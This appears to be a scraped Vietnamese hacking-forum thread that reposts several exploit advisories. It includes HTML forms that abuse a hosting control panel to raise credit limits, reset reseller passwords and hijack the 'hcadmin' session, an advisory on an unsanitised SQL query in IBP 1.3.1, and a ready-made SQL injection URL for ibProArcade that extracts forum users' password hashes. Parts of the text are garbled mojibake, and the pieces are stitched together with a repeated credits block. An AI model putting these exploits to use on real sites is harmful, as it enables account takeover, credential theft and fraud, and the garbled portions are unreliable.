<td>txtcardno</td> <td><input type="text" name="txtcardno" value=""></td> </tr> </table> <br><input type="submit"> </form> =============================================== 2- This code list all of resellers then you must change a password of one of them then login by it for next step. Note: Also by this code, everyone can increase its Credit value then buy every host. <form action="http://[url]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCre ditLimit" method="post"> <table> <tr> <td>Username:</td> <td><input type="text" name="UserName" value="hcadmin"></td> </tr> <tr> <td>Description:</td> <td><input type="text" name="Description" value=""></td> </tr> <tr> <td>FullName:</td> <td><input type="text" name="FullName" value=""></td> </tr> <tr> <td>AccountDisabled 1,[blank]:</td> <td><input type="text" name="AccountDisabled" value=""></td> </tr> <tr> <td>UserChangePassword:</td> <td><input type="text" name="UserChangePassword" value=""></td> </tr> <tr> <td>PassCheck=TRUE,0:</td> <td><input type="text" name="PassCheck" value="0"></td> </tr> <tr> <td>New Password:</td> <td><input type="text" name="Pass1" value=""></td> </tr> <tr> <td>DefaultDiscount%:</td> <td><input type="text" name="DefaultDiscount" value="100"></td> </tr> <tr> <td>CreditLimit:</td> <td><input type="text" name="CreditLimit" value="99999"></td> </tr> </table> <br><input type="submit"> </form> <hr><br> =============================================== 3- Now you must login by a resseler that changed password from last step. now goto userlist, if there is a user that will enough and if no user available, u must make it! now select it and click Enter to enter by that user. now the bug will be available: each reseller can gain every user session even "HCADMIN" by bug in "Check_Password.asp" below code will help you: <hr><br> Form1<br> <form action="http://[url]/Admin/Check_Password.asp" method="post"> <table> <tr> <td>AdName</td> <td><input type="text" name="AdName" value="hcadmin"></td> </tr> </table> <br><input type="submit"> </form> <hr><br> =============================================== Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili") Email: Irsdl[47]Yahoo[d07]com Team: GSG (Grayhatz Security Group) [Grayhatz.net] Thanks from: Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com) Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com) Kahkeshan Co. (IT Department) (www.kahkeshan.com) Related URLs: http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl) http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB) # milw0rm.com [2006-07-06] vns3curity(HCE) IBP Exploits 1.3.1 Trớch: Advisory number VI +++++++++++++++++++++ + ____ + + ||| ) || || + + ||| ) __ ||_|| + + |___) |__| | _ | + + || || || + + || || || + + + +++++++++++++++++++++ http://pro-hack.ru Product: IBP <= 1.3.1 programming language: php ẻủợỏồớớợủũố: õ ýờủùởợộũồ ùợờỗớ ốớũồồủớỷộ ỡồũợọ ùợọỏợ ùợở ủ ùợỡợựỹỵ like (ợữồớỹ ùợủũợ) Security searching: Advice Bug level: Moderate èợọồũợ ỡợổồũ ùợọớũỹ ủõợố ùõ ớ ụợúỡồ. ồọợủũũợữớ ụốởỹũửố ọớớỷừ if ($ibforums->input['move_id'] == "" or $ibforums->input['move_id'] == -1) { $std->Error( array( 'LEVEL' => 1, 'MSG' => 'move_no_forum' ) ); } // if ($ibforums->input['move_id'] == $ibforums->input['sf']) { $std->Error( array( 'LEVEL' => 1, 'MSG' => 'move_same_forum' ) ); } // $DB->query("SELECT id, subwrap, sub_can_post, name, redirect_on FROM ibf_forums WHERE id IN(".$ibforums->input['sf'].",".$ibforums- >input['move_id'].")"); http://pro-hack.org/exploits/our/ipb1.3_m_t_a.txt Tự dịch nhá, lấy từ Pro-hack.ru ai có ý kiến gì không ? QX147(HCE) ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit IPB: index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user] vBulettin forums: index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user] . (farhadjokers[4t]yahoo[d0t]com) Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com) Kahkeshan Co. (IT Department) (www.kahkeshan.com) Related URLs: http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt